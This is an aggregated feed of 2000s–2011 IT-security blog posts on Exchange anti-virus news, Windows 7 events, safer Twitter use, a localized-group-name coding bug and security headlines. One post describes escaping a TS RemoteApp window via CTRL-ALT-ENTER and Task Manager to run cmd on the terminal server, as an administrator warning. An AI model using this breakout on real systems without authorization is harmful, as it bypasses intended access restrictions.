    Channel Image17:18 Surprise! MS buying Sybari» Exchange Security

    Interesting news: Microsoft is buying Sybari, makers of the outstanding Antigen line of anti-virus products (and some pretty good anti-spam tools, too). Interestingly, there are Antigen versions for Exchange, Live Communications Server, SharePoint, and even Domino; I expect that the breadth of their product line made them a more appealing target than some of their peers. It'll be interesting to see how this acquisition works in conjunction with MS' buy of GeCAD's RAV technology. However, it will be even more interesting to see what effect this announcement has on the second-tier AV vendors-- companies like Command and Panda have got to be sweating now. (Not to mention that many organizations who have stuck with products they don't really like will now use this as an excuse to move!)

    Thu 03 February, 2005

    Channel Image00:01 Filter update for Exchange Intelligent Message Filter» Exchange Security

    I could snark about this filter update taking so long, but at least Microsoft's making the IMF freely available-- some messaging systems have no integrated spam filtering. Anyway, there's now a filter update for the IMF available here.

    Tue 01 February, 2005

    Channel Image13:29 Call for Papers: Exchange Connections Fall 2005!» Exchange Security

    Ordinarily I wouldn't post this announcement here, but I'm going to break tradition and do so because I'm one of the conference co-chairs. As such, I have to help find speakers, so I want this call for papers to go out far and wide.

    Windows IT Pro is now accepting session proposals for the Oct-Nov. 2005 Windows Connections conference. We're heading to San Diego October 30 to November 2, 2005, for the premier Windows technical conference, and we'd like to hear from you!

    If you're interested in speaking on Exchange-related topics at the show, send your abstracts to
    paul@robichaux.net by February 18. We want proposals for regular 75-minute sessions, as well as 1/2 day and full day pre-conference and post-conference sessions.

    Note that we have a limited number of speaking slots, and all participants must be able to present a minimum of three 75-minute sessions. There are three basic requirements:

    • Send a minimum of 3 session proposals (4 or 5 is ideal for discussion purposes)
    • Include a biographical statement with your session proposals
    • Include any additional pre- or post-con session proposals, if applicable

    Please adhere to the February 18 deadline as we need to make speaker and session selections right away. (We plan to have a conference brochure ready to distribute at TechEd in June.)

    Thu 27 January, 2005

    Channel Image12:49 The first glimpse of enlightenment» Exchange Security

    I had a very interesting phone call yesterday with an IBMer named Jim Colson. Jim actually is the chief architect responsible for the Workplace Client Technology platform, and he'd contacted me after seeing my earlier post complaining that WCT wasn't generally available to tell me that it is available. Clearly there was a disconnect if it appeared that two different parts of IBM were telling me two different things, so I was eager to get the lowdown.

    Jim explained that WCT is a client middleware platform, which  includes a wide range of technologies (including a managed client container, access technologies such as messaging, distributed business logic, data synchronization, and interaction technologies such as Embedded ViaVoice, and other presentation services including browser based and widget based interfaces from Eclipse).  These technologies can be used to build applications on various types of embedded, mobile, desktop, laptop, and server devices. The underlying technology has been in development for about 7 years; and  has been deployed in a wide range of solutions such as cars from Honda, Nokia mobile phones, laptops and tablets with Nissay,  and a wide range of line-of-business apps.

    WCT is currently available to customers in a variety of forms. It's already built into a number of other products, and the WCT Micro Edition SDK offers a freely downloadable set of WCT components that can be used to evaluate WCT as an app dev platform. (To be perfectly unambiguous: the SDK is for production use, but you can download it to play with.)

    WCT supports building deployable assemblies of components-- think of them as packaged runtimes-- to support particular applications. The Enterprise Offering (more properly, the Workplace Client Technology, Micro Edition Enterprise Offering, or WCTME-EO) bundles the most commonly required components and middleware services for desktop and laptop-class devices into a single deployable bundle. So, mea culpa: WCTME-EO and the WCT SDK are both generally available and widely used, my earlier claims notwithstanding.  Thanks Jim!

    Still with me? OK, back to my previous post. Among other WCT customers, Lotus is using the WCT platform to build their own client, the Workplace Client Technology, Rich Edition. This is the actual client middle platform that I've been trying to get, and it is not generally available-- at least according to my IBM sales rep and the Lotus WCT Project Office. That's supposed to change with the release of Lotus Workplace Messaging 2.5 and Lotus Workplace Documents 2.5.

    To put this in more familiar terms, my earlier post was roughly equivalent to complaining that Microsoft wouldn't let me have the .NET Framework (which is freely available and widely deployed, and for which beta/preview versions exist) when what I really wanted was Office. You can argue over whether Lotus is being forthright about exactly who can get  their WCT-based clients, and under what circumstances, but the bottom line is that WCT itself is available, and that's what Jim was trying to help me understand. Now I know what specific term to use next time I complain to Ed Brill.

    Wed 19 January, 2005

    Channel Image20:54 Script to retrieve white space for Exchange databases» Exchange Security

    Here's a very cool trick: Glen Scales wrote a script that finds all of your mailbox and public folder stores, then queries their servers' event logs to find event ID 1221s indicating how much white space is available. This is a slick solution to the vexing problem of monitoring how much white space is lurking in your databases.

    Mon 17 January, 2005

    Channel Image10:55 Local testing and push mode» NuFW Community Site
    When testing nufw in local mode (nufw and nuauth and client on the same computer), you have to know that, in push mode, nuauth ask authentication to source IP address.

    So if you connect to localhost with nutcpc and send a packet to an external host, the address will not be be 127.0.0.1 and the client will never authenticate the packet.

    Wed 15 December, 2004

    Channel Image08:35 NuFW 0.9.6, last steps before 1.0 release candidate» NuFW Community Site
    NuFW 0.9.6 is out !
    It has the following new features :
    • System, a new authentication module : it provides authentication against PAM and the user's group are check against the one of the system. This simple but powerful module brings to NuFW all the extensions of PAM and NSS.
    • TLS certificate authentication is now supported : it is possible to authenticate users by using the certificate they provide as token after having check it against a trusted certificate. It is a preliminary support as password protected are not supported for now.
    • SQL logging has been improved and logs now application and OS name.

    This [more ...]

    Thu 01 January, 1970

    Channel Image09:00 Using TS RemoteApp as an attack vector» Dana Epp's ramblings at the Sanctuary

    So in today's session at SMBNation that I spoke at, I showed how to use TS RemoteApp with TS Gateway on SBS2008 to deliver remote applications through Remote Web Workplace. It is one of the most cool features in the Windows Server 2008 operating system. But we have to remember what its doing.

    Part of the conversation we had was on the difference between local desktop display in TS RemoteApp vs just having a full desktop to the Terminal Server. One issue that came up was that as a RemoteApp, you can't run other applications.

    Well, that is not actually true. If you think that, then a TS RemoteApp has the ability to be an attack vector for you. What do I mean? Well below is a screen shot of what happens if you hit CTRL-ALT-ENTER with the cursor focused on the RemoteApp window (in this case MS Paint running remotely):

    At this point, you can run Task Manager.... then hit File->Run and run something else. In my case, I showed a few people afterwards how to start cmd and start exploring the network. Now, you will only have the privileges of the user account logged in as, but it is still something you have to be careful about. If you think a RemoteApp bundle prevents access to other application sor the network... you are wrong.

    So is this bad? No. Is it really an attack vector? No. You just need to understand that when allowing ANY type of Terminal Services based access, you have to restrict the policies and access accordingly. No matter if its local or remote. Running a TS RemoteApp bundle of Office will display on the local desktop, but is STILL running on the Terminal Server. So it will be browsing the network the Terminal Server is connected to as the local net. It will also browse your own drives mapped via tsclient. So you have to remember that.

    Hope thats useful. A TS RemoteApp bundle does NOT mean you won't have access to the TS desktop when displaying remotely on your personal desktop. And that's not a bad thing. TS Remote App is a convenient way to extend the workspace to your local machine, anywhere in the world. No pun intended. That's its power... and the benefit. Great remote productivity enhancement in Windows Server 2008. Use it. (Safely of course)

    Channel Image09:00 Time to party! Windows 7 is here!» Dana Epp's ramblings at the Sanctuary

    It's only a few days away. The official launch of Windows 7 is here!

    And of course, that means its time to party!!! You may have heard about the Windows 7 House Parties that are being thrown all around the world. Basically thousands of small groups of people are getting together to see what Windows 7 can do.

    Personally, I thought we needed to do more. So fellow MVP and friend Charlie Russel and I decided we would throw our own party. But focused on IT pros and not the consumer angle. We plan to have a lot of fun, showing the cool features of Windows 7 for IT pros like BitLocker, AppLocker and DirectAccess. We plan to bring a bunch of laptops and show new shell extensions, Powershell, new multitouch features and basically sit around and enjoy hours of Q&A for those that haven't tried it yet. We are even planning on installing Windows 7 on a guest's Macbook to show how well it does using Bootcamp on Apple hardware and even on small netbooks.

    I also wanted to send a message out to the Vancouver IT community to clear up some misconceptions. This is a party hosted by Charlie and myself. This is NOT a Microsoft event. Microsoft was gracious enough to let us use their facility and even sprung for some of the cost for pizza. However, they never planned this out. Nor did the local VanTUG and VanSBS groups.

    Our party is an INVITATION ONLY event. Because we are limited in our own budget and constrained in where we could have the party... we only have enough room for 75 people. So we could only allow a certain number of our friends to come. Charlie and I decided the best way to handle this would be to simply invite who we wanted, and then open it to our friends at the local user groups on a first come, first served basis. This is why there is a cap on the registration on the event, and why it booked up so quickly.

    I am hearing through the grapeline that there is a LOT of descent in the Vancouver IT community who feel that Microsoft, VanTUG and VanSBS did a poor job organizing this. >LET ME BE CLEAR. This is a personal party that Charlie and I organized. If you were lucky enough to get an invitation and registered, great. But if you didn't, don't take it out on Microsoft, the local usergroups or their leaders. It's not their fault!!!

    We are using our own money and time to throw this party. Please be considerate and respect that we couldn't invite all of you. I am happy to see there is so much excitement about Windows 7 and that you wanted to party with us. And I am sorry if you feel it isn't fair that you didn't get invited. Please feel free to share your own Windows 7 experience, and host your own party. We may be the only IT pro party during the Windows 7 launch, but nothing says you can't have your own!

    So party on. Welcome to a new world. Welcome to Windows 7!

    Channel Image09:00 RunAs Radio podcasts you might want to listen to» Dana Epp's ramblings at the Sanctuary

    Hey guys. I noticed Twitter is a buzz with a few podcast interviews I did on RunAs Radio lately. I thought I will post the links for those of you who don't follow such tweets.

    There were two interviews I did last month:

    The first interview was discussion on free tools available for network monitoring and diagnostics. The second was some in depth discussion on using DirectAccess with Windows 7 and Windows Server 2008 R2. I do hope you find both interviews fun and useful.

    Enjoy!

    Channel Image09:00 Reflecting on our Windows 7 birthday party» Dana Epp's ramblings at the Sanctuary

    So this week my buddy Charlie and I threw a Windows 7 party for the IT pro community in Vancouver, BC at the Microsoft office.

    The office could only handle 80 people, and we simply had to turn people away. Sorry to those who weren't allowed to come. Many people came early, and hung out in the hallway even before they were allowed in.

    With almost a 100 people in that hallway just out of the elevator, that hall was WARM. I felt bad for some of the people as you could tell they were overheating. But we weren't ready to let them in as we set up the rooms with different Windows 7 systems.

    When we did open the doors it was a mad rush for everyone to get in where it was cooler and they could grab a cold one and cool down. Thankfully everyone was patient and polite. Thanks to everyone for that!

    Once they got in, there were several different rooms that they could go hang out in. In one room, Charlie had brought a HP Media Touchsmart so people could experience the new multi touch functionality of Windows 7. Kerry Brown, a fellow MVP with experience in Windows shell, stayed in the room teaching people all the new shell features like Libraries, Jump Lists etc, and I am told schooled some admins on the nitty gritty of Power Shell. Good job Kerry! Thanks for helping out!!!

    It was interesting as everytime I looked in that room, people were surrounded around the device playing with the TouchPack games and with Virtual Earth. It was interesting to hear my buddy Alan comment that his experience on his iPhone with multitouch, especially with Google Earth, was far superior to what he was seeing there. Maybe that is something Microsoft can take away from that. Of course, big difference on a 24 inch monitor and a small iPhone screen. But the point is well taken.

    We had the biggest crowds when we did demos in the main presentation room. When I was presenting on DirectAccess security I had my good friend Roger Benes (a Microsoft FTE) demonstrate how Microsoft used DirectAccess themselves. Using the Microsoft guest wireless he connected seamlessly to Microsoft's corpnet, which allowed us to demonstrate the policy control and easy of use of the technology. I am told a lot of people enjoyed that session, with several taking that experience back to their own office to discuss deployment. Thats always good to hear.

    Charlie impressed the crowd showing how to migrate from Windows XP and Vista to Windows 7. He demonstrated Windows Easy Transfer and Anytime Upgrades and took the time to explain the gotchas in the experience. He even had me demonstrate XP mode on my laptop so people could see how they could maintain application compatibility with a legacy Windows XP virtualized on Windows 7.

    Of course, I had a lot of fun hanging out in the far back room. I got to demonstrate some of the security stuff built into Windows 7 like BitLocker, AppLocker and BitLocker to Go. I was even asked about Parental Controls which I couldn't show on my laptop since its domain joined, but was able to show on a demo box Roger had brought for people to play with.

    Some of the more interesting things I helped facilitate was asking my buddy Alan to bring his Macbook in. He is a great photographer who works with Linux and OSX a fair bit, on top of using Windows. Actually, all the photos you see in this post were taken by him. Thanks for sharing them Alan!

    Anyways, I convinced him to let us use his Macbook to install Windows 7. He reluctantly agreed, as you can see from the picture below when he was looking at the Snow Leopard and Windows 7 media together. :-)

    We had a fair number of people crowd around his Macbook as he went through the process of installing Bootcamp and deploying Windows 7. Interestingly enough, it flawlessly converted that Apple hardware into a powerful Windows 7 system in about 20 minutes.

    Charlie and I were REALLY busy. We had presented on different sessions in different rooms throughout the night. Actually, I very rarely even saw him except for a few times when he called me in to help out with a demo. Sorry we couldn't party more together Charlie. And my apologies to those that were looking forward to our traditional "Frick and Frack" show where we banter back and forth.

    Many of you may not know that outside of computers, I am an avid indie filmmaker. Actually, that is giving me too much credit. I am an amateur cinematographer at best, who had high hopes that I would get a chance to film everyone's impressions throughout the party. Unfortunately, I was so busy presenting, I had almost NO TIME to get any film recorded. *sigh* Alan did get a snap of a rare moment when I actually caught someone on film.

    Of course I can't complain too much. I had a great time getting to show all the neat features in Windows 7, and answering the tonnes of questions that people had.

    Of course, when the night finally wound down, it was nice to close out the party and watch the Vancouver skyline change. When we were done, we had the opportunity to hang with our IT friends in Vancouver and bring in the birth of Windows 7.

    I have several people I would like to thank for making the evening possible. Charlie and I couldn't have done it without the support of people like Graham from VanTUG, Jas from VanSBS and Roger from Microsoft. Speaking of Microsoft, I have to give a shout out to Sim, Sasha and Ljupco in the MVP team who helped us get through all the red tape to throw the party at Microsoft's office. And many thanks to Brent, Alan and Kerry for helping us out throughout the event. My thanks to all of you.

    I hope everyone had a good time. And if anything, Charlie and I hope you learned something that will help you deploy and use Windows 7 in your organizations. Happy birthday Windows 7. Welcome to a new world without walls!

    P.S. All the pictures you see here were taken by Alan and used with his permission. You can check out some of his other amazing work at bailwardphotography.com.

    Channel Image09:00 Microsoft SDL bans mempcy()... next it will be zeros!!!!» Dana Epp's ramblings at the Sanctuary

    So recently Microsoft banned memcpy() from their SDL process, which got several of us talking about perf hits and the likes when using the replacement memcpy_s, especially since it has SAL mapped to it. For those that don't know, SAL is the "Standard Annotation Language" that allows programmers to explicitly state the contracts between params that are implicit in C/C++ code. I have to admit its sometimes hard to read SAL annotations, but it works extremely well to be able to help compilers know when things won't play nice. It is great for static code analysis of args in functions, which is why it works so sweet for things like memcpy_s()... as it will enforce checks for length between buffers.

    Anyways, during the discussion Michael Howard said something that had me fall off my chair laughing. And I just had to share it with everyone, because I think it would make a great tshirt in the midst of this debate:

    Oh, I'm thinking of banning zero's next - so we can no longer have DIV/0 bugs! Waddya think?

    OK.. so its a Friday and that is funny to only a few of us. Still great fun though.

    Have a great long weekend! (For you Canadian folks that is)

    Channel Image09:00 Major Windows 7 gotcha you should know about that may block you from upgrading» Dana Epp's ramblings at the Sanctuary

    OK, so anyone who knows me expects that I stay up on the bleeding edge when it comes to dev tools and operating systems. Yes, I have been using Windows 7 for almost a year now and have been loving it. However, I never ran it on my production dev environment as I felt I did not what to disrupt our software development workflow until Windows 7 was in final release. With it out to RTM now, I felt it was as good as time as any to migrate, especially since we recently released our latest build of our own product and have a bit of time to do this.

    So last week I deployed Windows 7 to both of my production dev systems, as well as the primary QA lab workstations. It was the worst thing I could ever have done, halting all major development and test authoring in our office due to a MAJOR gotcha Microsoft failed to let us know about during the beta and RC.

    Ready for this....

    You cannot run Virtual PC 7 (beta) in Windows 7 WITHOUT hardware virtualization. OK, I can live with that, since the new XP mode (which is an excellent feature) may very well need it. That didn't concern me. It was my fall back that failed to work that blew my mind...

    You cannot run Virtual PC 2007 in Windows 7, as they have a hard block preventing it from being installed on Windows 7 due to compatibility issues. So the same machine that I have been using for development using Vista for a few years has now become a glorified browsing brick. I cannot do any of my kernel mode and system level development or debugging as I am not ALLOWED to install Virtual PC 2007 on the same hardware that worked before. *sigh*

    What surprised me is that Ben, the Virtual PC Guy at Microsoft blogged that it was possible to run Virtual PC on Windows 7, and in his own words:

    While all the integration aspects of Virtual Machine Additions work (mouse integration, shared folders, etc...) there is no performance tuning for Windows 7 at this stage - so for best performance you should use a system with hardware vitalization support.

    That sounds to me like it will still work without hardware virtualization. Seems that is not the case.

    Since Windows 7 is already to RTM, if this is a block due to Windows, it isn't going to be fixed anytime soon. So hopefully they can do something in the Virtual PC side of the equation, or they are going to disappoint a lot of unknowing developers.

    This just became a MAJOR blocking issue for many dev shops that are using Virtual PC for isolated testing.

    If this concerns you, then I recommend you download Intel's Processor Identification Utility so you can check to see if your dev environment is capable of running hardware virtualization.

    Failing to do so might get you stuck like I did, now having me decide if I want to degrade back to Windows Vista just to get work done. There goes another day to prep my main systems again. *sigh*

    UPDATE: Fellow MVP Bill Grant has provided me a solution to my delimma. It appears the issue is because Virtual PC 7 (beta), a built in component for Windows 7 when installed, is causing the blocking issue. By going into "Turn Windows features on or off" and removing Virtual PC support (and effectively removing XP mode support), Virtual PC 2007 can then be installed on machines that do not have hardware virtualization support.

    This isn't the most optimal behaviour, but acceptable. Since without VT support in my CPU I can't use XP mode anyways, removing it does not limit WIndows 7 from functioning. I have reported to Microsoft on this odd behaviour since:

    • Virtual PC 7 and XP Mode simply shouldn't be installing if my CPU isn't supported

    • When the Customer Experience dialog pops up there is an option to "Check for Solutions Online". This is a PERFECT time where they could explain to uninstall Virtual PC 7 and XP mode support built into Windows 7 so Virtual PC 2007 will not block. Right now it reports that no solution is available.

    So if you do NOT have VT support in your CPU, please uninstall Virtual PC 7 support if you installed it. VPC 2007 will then properly install for you.

    Channel Image09:00 Is Twittering safe?» Dana Epp's ramblings at the Sanctuary

    So Susan has been on my case about Twitter for some time now. In a recent round table we were recording she "beat me up" about it, and tonight on IM we had a good discussion about the REAL vs PERCEIVED risks in Twitter.

    Susan's biggest complaint is that security minded individuals shouldn't be blindly recommending the use of Twitter without educating the user on 'safe-twittering'. I would say that same logic exists for setting up web pages, blogs and the use of social networking sites like Facebook.

    She stepped that up a bit tonight when she blogged her discomfort in the fact the RSA Conference was recommending Twitter as well.

    So in an effort to stop spreading the FUD about Twitter insecurity, I wanted to share some of my thoughts through a quick set of safe twittering rules.

    @DanaEpp's 5 Rules of Safer Twittering


    • Never share information in a tweet that you wouldn't share with the world. You can never expect to take it back once it's on the Internet. Even though you can delete a tweet, 3rd party clients may still have it archived. If you feel you want to share private thoughts through Twitter, consider using a "Private Account" and limited it to only people you trust and want to share with. Of course, remember nothing prevents your friends from sharing your tweets with the world. So never share private information on Twitter. Ever. it's just easier that way.
    • There is no assurance that a Twitter account is the person you believe it is. Deal with it. Anyone can register an account if it doesn't already exist. As a real world example, for some time @cnnbrk was NOT an official CNN account, even though most of the Twitter world thought it was. It wasn't until recently that CNN bought the account from James Cox (the account holder) for an undisclosed amount of money. Another example is the fact that one of Susan's Twitter accounts was actually created by a fellow SBS MVP, and not actually her. :-)
    • Never click on links in a tweet, unless you trust the URL. If unsure, don't click! The worms that were used to attack Twitter came from people getting users to go to profile pages etc that they had control over for some interesting script attacks. With only 140 chars, its common to "shorten" the URL. Which means you might be clicking on a link blind. That's fine. But only trust shortened URLs that can be previewed BEFORE you go to it. As an example, my recommendation is to use something like TinyURL. However, here is the trick. When you create a TinyURL, use the preview mode. As an example, if you want to send someone to my blog you can use http://tinyurl.com/silverstr to go directly. However, if you use http://preview.tinyurl.com/silverstr it will stop at TinyURL.com and let the user SEE the link before they actually get to it. That is much safer. If using TweetDeck, select TinyURL as the provider, and when it creates the shortened url, simply add "preview." in front of "tinyurl.com".
    • Use a 3rd party Twitter client instead of using the Twitter.com website directly. I am a fan of TweetDeck and Twitterfon, but there are tons of different clients out there. Why? It is the lesser of two security evils as it relates to web based attacks in Twitter. Most clients have ways to reduce or turn off linking, prevents the script attacks in profile viewing and generally is just an easier environment to stay protected in. Are these clients free of attack? Of course not. But its another layer of defense. Of course... you need to have trust in your client. But that's a story for another day ;-)
    • You never know who is following you. Remember that. As you use Twitter more and more, you never know who might be watching. I recently had someone who has been trying to get an interview with me who follows me on Twitter, knew where I was having coffee one day because of a tweet I wrote (and it's geotag) and ended up coming down to confront me with his resume. Which was inappropriate in my books. But my own fault. I wasn't too concerned.. but it definitely gave me pause when considering my daughter uses Twitter and could be as easily found. Nothing like the potential of being stalked. GeoTagging makes it way to easy to find you. Remember that.

    Look, Twitter is addictive. Simple. Short. Fast. A great way to see the thoughts of others you might care about. Ultimately though... like any other Internet based technology it has the potential to be abused... and put you at risk. No different than websites or blogs.

    So be careful. Follow these rules and enjoy the conversation!

    Channel Image09:00 Come have Coffee and Code in Vancouver with me and Microsoft tomorrow» Dana Epp's ramblings at the Sanctuary

    So John Bristowe, Developer Evangelist for Microsoft Canada will be hosting a Coffee and Code event in Vancouver tomorrow from 9 to 2 at Wicked Cafe. Come join him and fellow Microsoft peers Rodney Buike and Damir Bersinic as they sit and share their knowledge over a cup of joe.

    I will be there too, and will be available if anyone wants to talk about secure coding, threat modeling with the SDL TM or if you want to talk about integrating AuthAnvil strong authentication into your own applications or architectures

    I do hope to see some of you there. And if I don't... I will be seeing you at #energizeIT right?

    What: Coffee and Code in Vancouver
    When: April 8th, 2009 from 9am - 2pm
    Where: Wicked Cafe - 861 Hornby Street (Vancouver)

    Channel Image09:00 Coding Tip: Why you should always use well known SIDs over usernames for security groups» Dana Epp's ramblings at the Sanctuary

    So have you ever tried to restrict access to your applications in a way so that you can maintain least privilege?

    I do. All the time. And recently it blew up in my face, and I want to share my experience so others can learn from my failure.

    Let me show you a faulty line of code:


    if( principal.IsInRole( "Administrators" ) )

    Seems rather harmless doesn't it? Can you spot the defect? Come on... its sitting right in the subject of this post.

    Checking to see if the current user is in the "Administrators" group is a good idea. And using WindowsPrincipal is an appropriate way to do it. But you have to remember that not EVERYONE speaks English. In our particular case, we found a customer installed our product using English, but had a user with a French language pack. Guess what... the above code didn't work for them. Why? Because the local administrators group is actually "Administrateurs".

    The fix is rather trivial:


    SecurityIdentifier sid = new SecurityIdentifier( WellKnownSidType.BuiltinAdministratorsSid, null );
    if (principal.IsInRole(sid))

    By using the well known SID for the Administrators group, we ensure the check regardless of the name or language used.

    Lesson learned the hard way for me. We have an entire new class of defect we are auditing for, which we have found in several places in our code. it always fails securely, NOT letting them do anything, but that's not the point. It is still a defect. Other accounts we weren't considering were "Network Service" (its an ugly name on a German target) and "Guest". Just to name a few.

    Hope you can learn from my mistake on that one. That's a silly but common error you may or may not be considering in your own code.

    Channel Image09:00 Announcing Elevation of Privilege: The Threat Modeling Game» Dana Epp's ramblings at the Sanctuary

    I have had the pleasure over the past few months to spend some time playing with an early rendition of " Elevation of Privilege: The Threat Modeling Game". According to Adam, "Elevation of Privilege is the easiest way to get started threat modeling".  I couldn't agree more. If you have a team that is new to the whole process of threat modeling, you will want to check it out. If you are at RSA this week, drop by the Microsoft booth and pick the game up for free. If you aren't, you can download it here.

    EoP is a card game for 3-6 players. The deck contains 74 playing cards in 6 suits: one suit for each of the STRIDE threats (Spoofing, Tampering, Repudiation, Information disclosure, Denial of Service and Elevation of Privilege). Each card has a more specific threat on it.  You can see a short video on how to play and some more information about the game by checking our Adam's post here. In the end, it is a game that makes it possible to have more fun when thinking about threats. And that's a good thing.

    Even more impressive is that they have released the game under Creative Commons Attribution license which gives you freedom to share, adapt and remix the game. So you if you feel you can improve up this, step up and let everyone know!!   

    Congratulations to the SDL team at Microsoft for creating an innovative way to approach the concept of threat modeling.

    Channel Image08:00 Will Google Build an Uber Android?» LinuxInsider
    The initial response to Google's surprise announcement on Monday that it had inked a deal to acquire Motorola Mobility for US$12.5 billion was that it was a move largely to protect itself from the increasing patent attacks against Android. That could be why all five major manufacturers of Android devices appear to be thrilled with the deal. Should they be?
    Channel Image08:00 What Would Linus Do About GNOME 3? Why, Use Xfce» LinuxInsider
    Debates are always plentiful here in the Linux blogosphere, and the topic of desktop environments is no exception. That may be more true now than ever before, in fact, thanks to GNOME 3, which has come to rival only Unity in the controversy it has caused. It's one thing when a mere mortal user criticizes GNOME; however, it's quite another when none other than Linus Torvalds does.
    Channel Image08:00 WASC Announcement: 'Static Analysis Tool Evaluation Criteria' Call For Participants» CGISecurity - Website and Application Security News
    I sent the following out to The Web Security Mailing List (which I moderate) announcing a new WASC Project. "The Web Application Security Consortium is pleased to announce a new project "Static Analysis Tool Evaluation Criteria (SATEC)". Currently WASC is seeking volunteers from various sections of the community including security researchers, academics,...
    Channel Image08:00 The OWASP AppSec USA 2011 Call for Papers (CFP)» CGISecurity - Website and Application Security News
    Lorna Alamri writes in the following announcement "The OWASP AppSec USA 2011 Call for Papers (CFP) is now open. Visit the following URL to submit your abstract for the September 22-23, 2011 talks in Minneapolis, Minnesota: http://www.appsecusa.org/talks.html We're excited to announce that speakers will be in good company with our first keynote,...
    Channel Image08:00 The Future of Android, Part 2: Security Snafus» LinuxInsider
    The number of attacks on Android devices has been rising over the past few months. The malware has exotic names such as "Zitmo," "DroidDreamLight," "Hong Tou Tou," "DroidKungFu," "YZHCSMS," "Geinimi" and "Plankton." In January 2010, Google removed more than 50 fake banking apps from the Android market, and in March of this year, it removed another 50 infected apps.
    Channel Image08:00 Summary of Google+ browser security protections» CGISecurity - Website and Application Security News
    Ray "Vanhalen" Kelly has written a post describing the security mechanisms used by Google+, as well as compares them to facebook. In particular he reviews each HTTP protection header and provides a good explanation of the purpose of each protection. Link: http://www.barracudalabs.com/wordpress/index.php/2011/07/21/google-gets-a-1-for-browser-security-3/
    Channel Image08:00 Shelter for Linux in the Software Patent Storm» LinuxInsider
    Patents, patents, patents. Such a to-do about software patents! The news this week has focused on little else, thanks in large part, of course, to Google's much-discussed purchase of Motorola Mobility. It's fairly widely agreed that patents were the motivating factor behind that purchase -- not at all surprising, given the virtual lawsuit-fest the mobile world has become.
    Channel Image08:00 Results of internet SSL usage published by SSL Labs» CGISecurity - Website and Application Security News
    Ivan Ristic (of modsecurity fame) has published the results of an evaluation against over 900,000 websites supporting SSL. The goal of this evaluation was to see how people really use/misuse ssl in the wild, as well as report on the usage of browser protections such as the Secure cookie flag, and Strict-Transport-Security....
    Channel Image08:00 Quick defcon/blackhat preparation list» CGISecurity - Website and Application Security News
    A couple of people had asked me what are some things that you can do prior to attending hacker cons such as Blackhat and Defcon. Kurt Cobain said it best "Just because you're paranoid, doesn't mean they're not after you'. Here's a short list (albeit not complete as I don't plan to...
    Channel Image08:00 PiTiVi: A Solid B-Lister of a Movie-Maker» LinuxInsider
    PiTiVi is a GTK-based film editor that shows promise but lacks enough refinement to be much more than a "lite" version of other film packages. Its interface is simple enough to use as it was designed, with both newbie and seasoned film fanciers in mind. PiTiVi was created in 2004 by a team of student developers. Recent versions are rewritten in Python and wrap around the GStreamer Multimedia Framework.
    Channel Image08:00 PartedMagic: A Swiss Army Knife for Hard Drive Resuscitation» LinuxInsider
    I started out looking for a handy disk partitioning tool to repair a colleague's ailing computer. I ended up finding a toolbox full of very handy repair and system maintenance apps. As a bonus, I got all of this packed into a nifty specialized Linux distro called "PartedMagic" that boots into RAM from a CD or USB drive.
    Channel Image08:00 Paper: Web Application finger printing Methods/Techniques and Prevention» CGISecurity - Website and Application Security News
    Anant Shrivastava has posted a whitepaper providing a rundown of application fingerprinting methodologies, as well as comparisons of various tools such as W3af, BlindElephant, and Wapplyzer. "This Paper discusses about a relatively nascent field of Web Application finger printing, how automated web application fingerprinting is performed in the current scenarios, what are...
    Channel Image08:00 Oracle website vulnerable to SQL Injection» CGISecurity - Website and Application Security News
    Someone has published a SQL Injection in labs.oracle.com at http://www.thehackernews.com/2011/07/oracle-website-vulnerable-to-sql.html . That is all.
    Channel Image08:00 NIST publishes 50kish vulnerable code samples in Java/C/C++, is officially krad» CGISecurity - Website and Application Security News
    NIST has published a fantastic project (its been out since late December, but I only just became aware of it) where they've created vulnerable code test cases for much of MITRE's CWE project in Java and c/c++. From the README "This archive contains test cases intended for use by organizations and individuals...
    Channel Image08:00 Microsoft's 'Linux Threat Level': Down to Green or Redder Than Ever?» LinuxInsider
    Now that Microsoft wants to be Linux's new best friend, there's bound to be no end of sweet nothings and touching gestures emanating out of Redmond. After all, we're pals now, right? Lo and behold! For all you skeptics who doubted the software behemoth's amorous words, consider a few phrasing changes it recently made in its last two annual financial filings.
    Channel Image08:00 Linux Distros: When It Absolutely, Positively Has to Be Secure» LinuxInsider
    If you use Linux instead of Microsoft Windows, its free availability may well be a deciding factor. But the fact that virus and malware contamination are less likely to take down your Linux computers is no doubt an essential influencing factor as well. But does using a more popular Linux distro like Canonical's Ubuntu make your system more or less vulnerable than a Linux-on-a-stick variety such as Puppy Linux?
    Channel Image08:00 How not to publish SCADA security advisories» CGISecurity - Website and Application Security News
    "Luigi Auriemma" has posted an interesting series of SCADA vulnerabilities to the bugtraq security list this morning. From his email "The following are almost all the vulnerabilities I found for a quick experiment some months ago in certain well known server-side SCADA softwares still vulnerable in this moment. In case someone doesn't...
    Channel Image08:00 Do You Really Know What Your Android Is Capable Of?» LinuxInsider
    As a Sprint corporate customer I'm referred to as "preferred," which basically translates to "preferred because I give them increasing amounts of money." Anyway, it gets me a phone upgrade annually, rather than the non-preferred biannual deal. The only problem with an annually replaced gadget is you have to figure out how to use it annually too.
    Channel Image08:00 Commercial Gains Mean Growing Pains for Open Source Community» LinuxInsider
    Recent conversations at OSCON, which I've attended since 2004, as well as observations through talks with vendors, users and developers in open source all indicate a common theme: With commercial successes for open source software come some community growing pains. This was also illustrated to some extent by the attendance, content and vibe at this year's OSCON.
    Channel Image08:00 Another use of Clickjacking, Cookiejacking!» CGISecurity - Website and Application Security News
    Rosario Valotta has published an interesting attack against IE that takes advantage of clickjacking. In a nutshell it combines origin flaws within IE with clickjacking to trick a user into copying/pasting their own cookies from any site! Demonstration below The technical details can be found at https://sites.google.com/site/tentacoloviola/cookiejacking and his slides at https://docs.google.com/viewer?a=v&pid=sites&srcid=ZGVmYXVsdGRvbWFpbnx0ZW50YWNvbG92aW9sYXxneDoxMWJlZTI5ZjVhYjdiODQx
    Channel Image08:00 A Visit from the Ghost of Linux Future» LinuxInsider
    Industry pundits may typically favor the start of a new year for making long-term predictions, but here in the Linux blogosphere -- where the dog days of summer have us effectively trapped in a small set of heavily air-conditioned bars and saloons -- we like August. When else, after all, are the hours so plentiful or the tempers so hot?
    Channel Image06:00 Steven Pinker on Terrorism» Schneier on Security

    It's almost time for a deluge of "Ten Years After 9/11" essays. Here's Steven Pinker:

    The discrepancy between the panic generated by terrorism and the deaths generated by terrorism is no accident. Panic is the whole point of terrorism, as the root of the word makes clear: "Terror" refers to a psychological state, not an enemy or an event. The effects of terrorism depend completely on the psychology of the audience.

    [...]

